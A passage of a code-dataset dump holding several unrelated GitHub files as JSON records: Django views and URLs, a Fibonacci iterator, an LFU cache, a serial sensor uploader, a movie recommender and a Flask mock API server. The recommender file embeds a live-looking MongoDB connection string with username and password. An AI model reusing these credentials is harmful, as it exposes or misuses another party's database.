"line_number": 499, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 515, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 515, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 523, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 523, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 588, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 590, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 591, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 605, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 656, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch_geometric.data.Data", "line_number": 664, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 671, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 672, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 675, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 675, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 679, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 679, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 683, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 683, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 687, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 687, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 691, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 691, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 695, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 695, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 701, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 701, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 705, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 705, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 720, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 722, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 722, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 726, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 755, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 756, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 756, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 757, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 757, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 796, "usage_type": "call"}, 
{"api_name": "cv2.resize", "line_number": 803, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 803, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 828, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 834, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 842, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 842, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 849, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 852, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 861, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 864, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 887, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 888, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 889, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 890, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 891, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 892, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 917, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 918, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 919, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 920, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 921, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 922, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "time.time", "line_number": 951, "usage_type": "call"}, {"api_name": "time.time", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 964, "usage_type": "call"}, {"api_name": "time.time", "line_number": 969, "usage_type": "call"}, {"api_name": "time.time", "line_number": 977, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", "line_number": 987, "usage_type": "call"}, {"api_name": "time.time", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1000, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1005, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1013, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1018, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1023, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1031, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1036, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1041, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1049, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1054, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1067, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1072, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1077, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1085, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 1139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1141, "usage_type": "call"}, {"api_name": 
"cv2.waitKey", "line_number": 1169, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 1178, "usage_type": "call"}]} +{"seq_id": "23596415074", "text": "import os\nfrom copy import deepcopy\n\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render\n\nfrom .cv import CV\n\n\ndef static_url(relative_path: str) -> str:\n return os.path.join(settings.STATIC_URL, relative_path)\n\n\nclass NavView(View):\n\n NAV_DEFAULT = {\n 'home': {\n 'label': 'Home',\n 'active': False,\n 'url': reverse_lazy('home')\n },\n 'blog': {\n 'label': 'The Blog',\n 'active': False,\n 'url': reverse_lazy('blog:entry_list')\n }\n }\n\n def __init__(self, *args, **kwargs):\n self.nav = deepcopy(self.NAV_DEFAULT)\n super(NavView, self).__init__(*args, **kwargs)\n\n\nclass HomepageView(NavView):\n\n template = 'pages/home.html'\n\n def get(self, request):\n\n context = {\n 'nav': self.nav\n }\n context.update(CV)\n context['nav']['home']['active'] = True\n\n return render(request, self.template, context=context)\n\n\n\n\n", "repo_name": "the16thpythonist/electronicheart", "sub_path": "electronicheart/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "cv.CV", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "36362980224", "text": "\"\"\"\nIterador para la serie de Fibonacci.\n\nCreamos el iterador como una clase derivada de collections.abc.Iterator.\n\nAutor: Rafael del Castillo Gomariz\n\"\"\"\nfrom typeguard import typechecked\nfrom collections.abc import Iterator\n\n\n@typechecked\nclass FibonacciIterator(Iterator):\n\n def __init__(self, stop: int = 10):\n if stop < 1:\n raise ValueError(\"El máximo de elementos de la serie no puede ser negativo\")\n self.__index = 0\n self.__current = 0\n self.__next = 1\n self.__stop = stop\n\n def __next__(self):\n if self.__index == self.__stop:\n raise StopIteration\n self.__index += 1\n fib_num = self.__current\n self.__current, self.__next = self.__next, self.__current + self.__next\n return fib_num\n\nif __name__ == '__main__':\n print(\"Serie de Fibonacci\")\n print(\"------------------\")\n\n n = int(input(\"¿Cuántos números quiere mostrar? 
\"))\n for i, fib_n in enumerate(FibonacciIterator(n)):\n print(f\"{i+1}: {fib_n}\")\n", "repo_name": "rdelcastillo/DAW-Python", "sub_path": "ejemplosclase/7iteradores/iterador_fibonacci.py", "file_name": "iterador_fibonacci.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.abc.Iterator", "line_number": 13, "usage_type": "name"}, {"api_name": "typeguard.typechecked", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "30727276831", "text": "import os\nimport time\nfrom celery import Celery\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'redis://localhost:6379')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\n\n@celery.task(name='tasks.find_solution')\ndef find_solution(ncs: str, sequence: str, stocks: str) -> str:\n time.sleep(5)\n return 'ncs: {}\\nsequence: {}\\nstock: {}'.format(ncs, sequence, stocks)", "repo_name": "micolaprs/comblabel", "sub_path": "src/queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "23882870380", "text": "from collections import defaultdict, OrderedDict\n\nclass LFUCache:\n\n# Approach: Use ordereddict and normal dict, keep updating stack as and when a key is accessed\n# TC: O(1) for get and put functions as we use ordereddict which works like a DLL\n# SC: O(1) + O(1) as capacity of the 2 dicts is constant\n\n def __init__(self, capacity: int):\n self.value_map = {} # To store all keys and their frequencies (key:freq)\n self.freq_map = {} # To store all keys and value in cache in order (freq: {key: val})\n self.capacity = capacity\n self.lowest_frequency = 1\n\n def update_key(self,key: int, value: int = None): \n freq = self.value_map[key]\n if not value:\n # Get operation being performed so retain val\n val = self.freq_map[freq][key]\n else:\n # Put operation for exisiting key, so update val\n val = value\n # 1. Remove entry from freqmap\n del self.freq_map[freq][key] \n # 2. Append to front of freqmap\n if freq+1 in self.freq_map:\n self.freq_map[freq+1][key] = val \n else:\n self.freq_map[freq+1]= defaultdict(OrderedDict)\n self.freq_map[freq+1][key] = val \n # 3. 
Update freq in valuemap\n self.value_map[key] = freq+1\n \n if self.lowest_frequency == freq and not self.freq_map[freq]: # Update lowest freq\n self.lowest_frequency += 1\n \n return val\n\n def get(self, key: int) -> int:\n if key in self.value_map:\n # If key exists, return and update freq_map and value_map\n return self.update_key(key)\n return -1\n\n def put(self, key: int, value: int) -> None:\n if not key in self.value_map:\n # Adding new entry so check cache capacity \n if not self.capacity:\n # Evict key and value\n if self.lowest_frequency in self.freq_map:\n # 1. Get 1 st key in ordered dict\n first_key = next(iter(self.freq_map[self.lowest_frequency]))\n if len(self.freq_map[self.lowest_frequency]) > 1: \n # 2. If more than one entry for lowest freq, need to evict as per lru\n del self.freq_map[self.lowest_frequency][first_key]\n del self.value_map[first_key]\n else:\n # 3. Only one entry for lowest frew so evict directly\n del self.freq_map[self.lowest_frequency]\n del self.value_map[first_key]\n self.capacity += 1\n if self.capacity:\n # To ensure there is any capacity to begin with \n if 1 not in self.freq_map: # Adding element for first time so freq is 1\n self.freq_map[1] = defaultdict(OrderedDict)\n self.freq_map[1][key] = value # Add key in freqmap\n self.value_map[key] = 1 # Add key in valuemap\n self.lowest_frequency = min(1, self.lowest_frequency) # Update lowest freq\n self.capacity -= 1 # Update capacity\n else:\n # Updating existing entry \n self.update_key(key,value)\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)", "repo_name": "sanafathima418/StriverSDESheet", "sub_path": "Stack/lfu_cache.py", "file_name": "lfu_cache.py", "file_ext": "py", "file_size_in_byte": 3385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 29, "usage_type": "argument"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "argument"}]} +{"seq_id": "41575861174", "text": "import serial \nimport threading\nimport requests\nimport time\nimport random\nimport os\nclass DeviceHandler:\n \n def __init__(self,device_id,location,baud_rate = 9600,serial_port = '/dev/ttyUSB0',server_address = 'http://127.0.0.1:3000/post-data'):\n self.baud_rate = baud_rate\n self.serial_port = serial_port\n self.server_address = server_address \n self.DeviceID = device_id\n self.Location = location\n\n try:\n self.uc = serial.Serial(self.serial_port,self.baud_rate)\n\n except:\n print(\"\\nPermission issues detected while accessing the port.\\n\\tTry running - 'sudo chmod a+rw /dev/ttyUSB0'\\n\")\n exit()\n\n def run(self):\n try:\n FetchedData = self.uc.readline()\n FetchedData = FetchedData.decode(\"utf-8\") \n\n var1,var2,var3,var4 = FetchedData.split('-')\n except:\n print('\\nHaving issues with decoding...')\n return\n\n\n data ={\n 'CO2':var1.strip(),\n 'CO':var2.strip(),\n 'CH4':var3.strip(),\n 'AIRQ':var4.strip(),\n 'DeviceID': self.DeviceID,\n 'location': self.Location\n }\n try:\n r = requests.post(self.server_address,data)\n except:\n os.system('clear')\n print('\\n\\tServer not responding...Make sure its up and running\\n\\t\\tReconnecting in 10 secs..')\n time.sleep(10)\n return\n print('\\n\\tValue Sent 
-> ' + str(data['CO2'])+\" \"+str(data['CO'])+\" \"+str(data['CH4'])) \n\n\n\nif __name__ == \"__main__\":\n \n handler = DeviceHandler(device_id = 'JAGAT2019',location = 'Jagatpura')\n \n while True:\n handler.run()\n time.sleep(10)\n", "repo_name": "mayankt28/YU", "sub_path": "RPi-Code/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "serial.Serial", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "15201616342", "text": "#!/usr/bin/env python\n#\n# This file is part of cpu_cores released under the MIT license.\n# See the LICENSE file for more information.\n\nfrom setuptools import setup, find_packages\nimport cpu_cores\n\nDESCRIPTION = \"cpu_cores-py is a small python library to get the number of\" +\\\n \"'real physical' cpu cores of a linux/osx box\"\ntry:\n with open('PIP.rst') as f:\n LONG_DESCRIPTION = f.read()\nexcept IOError:\n LONG_DESCRIPTION = DESCRIPTION\n\nwith open('pip-requirements.txt') as reqs:\n install_requires = [\n line for line in reqs.read().split('\\n') if (line and not\n line.startswith('--'))]\n\nsetup(\n name='cpu_cores',\n version=cpu_cores.__version__,\n author=\"Fabien MARTY\",\n author_email=\"fabien.marty@gmail.com\",\n url=\"https://github.com/thefab/cpu_cores\",\n packages=find_packages(),\n license='MIT',\n download_url='https://github.com/thefab/cpu_cores',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n scripts=[\"scripts/get_cpu_physical_cores.py\"],\n install_requires=install_requires,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Utilities',\n 'Topic :: System :: Hardware',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development',\n ]\n)\n", "repo_name": "thefab/cpu_cores", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "cpu_cores.__version__", "line_number": 24, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "32379609335", "text": "from django.urls import path\n\nfrom . 
import views\n\napp_name = 'dns_records'\nurlpatterns = [\n path('', views.DnsRecordListView.as_view(), name='list'),\n path('export/', views.ZoneExportView.as_view(), name='zone_export'),\n path('import/', views.ZoneImportView.as_view(), name='zone_import'),\n path('create/', views.DnsRecordCreateView.as_view(), name='create'),\n path('/', views.DnsRecordDetailView.as_view(), name='detail'),\n path('/update/', views.DnsRecordUpdateView.as_view(), name='update'),\n path('/delete/', views.DnsRecordDeleteView.as_view(), name='delete'),\n]\n", "repo_name": "sjy5386/flare-core", "sub_path": "records/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "18224127194", "text": "# author: @iamtienng\n# import tools for saving model in database\nimport pickle\n\n# import tools for machine learning model\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# import machine learning model\nfrom recommendation_system.matrix_factorization import MatrixFactorization\n\n# import tools for database\nfrom pymongo import MongoClient\nimport bson\n\n# connect to the database\n# usernameDB = \"iamtienng\"\n# passwordDB = \"d4O8CmCGCeCI8vzA\"\nclient = MongoClient(\n 'mongodb+srv://iamtienng:d4O8CmCGCeCI8vzA@mrsbbdb.wqcrinp.mongodb.net/?retryWrites=true&w=majority')\n# localhost\n# client = MongoClient(\"localhost\", 27017)\ndb = client[\"MRSBBDB\"]\n# YOU MUST import ratings through MongoDBCompass\n# YOU MUST import movies through MongoDBCompass\n\n# load models for mfcf model if the model does not exist in the database\nW = np.asarray([])\nX = np.asarray([])\nd = np.asarray([])\nb = np.asarray([])\nif len(list(db[\"model\"].find())) == 0:\n W = np.loadtxt('./data/W.csv', delimiter=',')\n X = np.loadtxt('./data/X.csv', delimiter=',')\n d = np.loadtxt('./data/d.csv', delimiter=',')\n b = np.loadtxt('./data/b.csv', delimiter=',')\n\n wf = {\"name\": \"W\", \"value\": bson.Binary(pickle.dumps(W, protocol=2))}\n xf = {\"name\": \"X\", \"value\": bson.Binary(pickle.dumps(X, protocol=2))}\n df = {\"name\": \"d\", \"value\": d.tolist()}\n bf = {\"name\": \"b\", \"value\": b.tolist()}\n\n db[\"model\"].insert_one(wf)\n db[\"model\"].insert_one(xf)\n db[\"model\"].insert_one(df)\n db[\"model\"].insert_one(bf)\nelse:\n for model in db[\"model\"].find():\n if model['name'] == \"W\":\n W = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"X\":\n X = np.asarray(pickle.loads(model['value']))\n elif model['name'] == \"d\":\n d = np.asarray(model['value'])\n elif model['name'] == \"b\":\n b = np.asarray(model['value'])\n\n# load all ratings as utility matrix for mfcf model\nratings_cursor = db['rating'].find()\nratings_dataframe = pd.DataFrame(list(ratings_cursor), columns=[\n 'userId', 'movieId', 'rating', 'timestamp']).astype({'userId': int, 'movieId': int, 'rating': int, })\nratings_matrix = 
np.asmatrix(ratings_dataframe)\nrate_train, rate_test = train_test_split(\n ratings_matrix, test_size=0.2, random_state=10)\n\n# mfcf machine learning model\nmfcf_model = MatrixFactorization(\n Y=ratings_matrix, K=50, lam=.01, Xinit=X, Winit=W, bInit=b, dInit=d, learning_rate=50, max_iter=30)\n", "repo_name": "iamtienng/movie-recommendation-system", "sub_path": "mrsbb/BackEnd/mrsbb-be/extensions.py", "file_name": "extensions.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 39, "usage_type": "call"}, {"api_name": "bson.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "recommendation_system.matrix_factorization.MatrixFactorization", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "20852606899", "text": "from flask import Flask, request\nimport flask\nfrom flask.globals import session\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom werkzeug.datastructures import Accept\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom datetime import datetime, date\nimport xmltodict\nimport random\nimport base64\nimport json\nimport ipaddress\n\napp = Flask(__name__)\nauth = HTTPBasicAuth()\nbearer = HTTPTokenAuth(scheme='Bearer')\n\njson_data = {\n \"response\": {\n \"status\": \"success\",\n \"name\": \"http mock server\",\n \"date\": date.today(),\n \"time\": datetime.now().strftime(\"%H:%M:%S\"),\n \"details\": {\n \"id\": \"12345\",\n \"name\": \"dummy data\",\n \"description\": \"ubot testing for generic http servers\"\n },\n \"data\": []\n }\n}\n\nid = 3896\n\nxml_data = xmltodict.unparse(json_data, pretty=True)\n\nusers = {\n 'admin': generate_password_hash('admin')\n}\n\ntokens = dict()\nsessions = dict()\nallocated = dict()\n\n@auth.verify_password\ndef verify_password(username, password):\n if username in users and check_password_hash(users.get(username), password):\n return username\n\n@bearer.verify_token\ndef 
verify_token(token):\n if token in tokens:\n return tokens[token]\n\n@app.route('/', methods=['GET'])\ndef get_endpoints():\n ep_dict = {\n 'endpoints': {\n 'GET': '/api/v1/get_data',\n 'POST': '/api/v1/post_data',\n 'PUT': '/api/v1/modify_data',\n 'PATCH': '/api/v1/modify_data',\n 'DELETE': '/api/v1/remove_data',\n 'HEAD': '/api/v1/head',\n 'RESET': '/api/v1/reset_data',\n 'TEST TOKEN': '/token-auth',\n 'GET TOKEN (header)': '/api/v1/get-token',\n 'GET TOKEN': '/api/v2/get_token',\n 'GET SESSION': '/api/v2/get_session',\n 'ALLOCATE': '/api/v2/allocate',\n 'DEALLOVATE': '/api/v2/deallocate'\n }\n }\n if request.headers.get('accept') == 'application/xml':\n return xmltodict.unparse(ep_dict, pretty=True), 200\n else:\n return ep_dict, 200\n\n\ndef print_globals(task):\n print(\"-------------------\", task, \"--------------------\")\n print(\"tokens: \", tokens)\n print(\"sessions: \", sessions)\n print(\"allocated: \", allocated)\n print(\"-------------------------------------------------\")\n\n@app.route('/api/v2/get_token', methods=['POST'])\ndef get_access_token():\n global tokens\n data = json.loads(request.get_data().decode())\n username = data.get('user')\n num = random.randint(10000, 99999)\n tm = datetime.now()\n token_string = f'{tm}{username}{num}'\n token = base64.b64encode(token_string.encode()).decode()\n tokens[token] = username\n return f'\"token\": \"{token}\"', 200\n\n\n@app.route('/api/v2/get_session', methods=['POST'])\ndef get_session():\n global sessions\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n if token not in tokens:\n return \"Invalid token\", 400\n session_id = random.randint(20124, 99999)\n sessions[session_id] = token\n return f'\"session-id\": \"{session_id}\"', 200\n\n\n@app.route('/api/v2/allocate', methods=['POST'])\ndef allocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n subnet = data.get('subnet')\n network = ipaddress.ip_network(subnet)\n for add in network.hosts():\n if add not in allocated.values():\n allocated[int(session)] = add\n return f'\"ip-address\": \"{add}\"', 200\n return 'no address available', 400\n\n\n@app.route('/api/v2/deallocate', methods=['POST'])\ndef deallocate():\n data = json.loads(request.get_data().decode())\n token = data.get('token')\n session = data.get('session')\n if int(session) not in sessions:\n return \"Invalid session id\", 400\n if sessions.get(int(session)) != token:\n return \"Invalid token\", 400\n if int(session) in allocated:\n del allocated[int(session)]\n return \"Deallocated\", 200\n\n\n@app.route('/api/v1/get_data', methods=['GET'])\ndef get_data():\n try:\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n xml_data = xmltodict.unparse(json_data, pretty=True)\n return xml_data, 200\n else:\n return json_data, 200\n except Exception as e:\n return f\"{e}\", 500\n\n@app.route('/api/v1/get_data/', methods=['GET'])\ndef get_data_by_id(id):\n try:\n print(id)\n final_data = {\n \"msg\": \"no data found\"\n }\n data = json_data.get('response').get('data')\n for d in data:\n print(d.get('id'))\n if d.get('id') and str(d.get('id')) == id:\n final_data = d\n accept = request.headers.get('accept')\n if accept == 'application/xml':\n return xmltodict.unparse(final_data, pretty=True), 200\n else:\n return final_data, 200\n except Exception as e:\n 
return f\"{e}\", 500\n\n\ndef update(success_code):\n global id\n try:\n data = None\n content_type = request.headers.get('Content-Type')\n print(content_type)\n if content_type == 'application/json':\n data = request.get_json()\n data['id'] = id\n id = id+1\n input_type = 'json'\n elif content_type == 'application/xml':\n data = request.get_data().decode()\n try:\n data_dict = xmltodict.parse(data)\n data = xmltodict.unparse(data_dict, pretty=True)\n input_type = 'xml'\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'invalid xml: {e}'\n }, 400\n elif content_type == 'application/x-www-form-urlencoded':\n print('step-1')\n data = request.form\n print(data)\n input_type = 'form data'\n elif 'multipart/form-data' in content_type:\n data = request.form\n files = request.files\n print(files)\n input_type = 'mulitpart form data'\n else:\n data = request.get_data().decode()\n input_type = 'raw data'\n if data is not None and data != \"\":\n try:\n json_data['response']['data'].append(data)\n except Exception as e:\n pass\n finally:\n return {\n 'status': 'success',\n 'msg': 'valid input',\n 'input-type': input_type,\n 'input': data\n }, success_code\n else:\n return {\n 'status': 'success',\n 'msg': 'input is None'\n }, success_code\n except Exception as e:\n print(e)\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/create_data', methods=['POST'])\ndef post_data():\n return update(201)\n\n\n@app.route('/api/v1/modify_data/', methods=['PUT', 'PATCH'])\ndef put_data(id):\n return update(202)\n\n@app.route('/api/v1/reset_data', 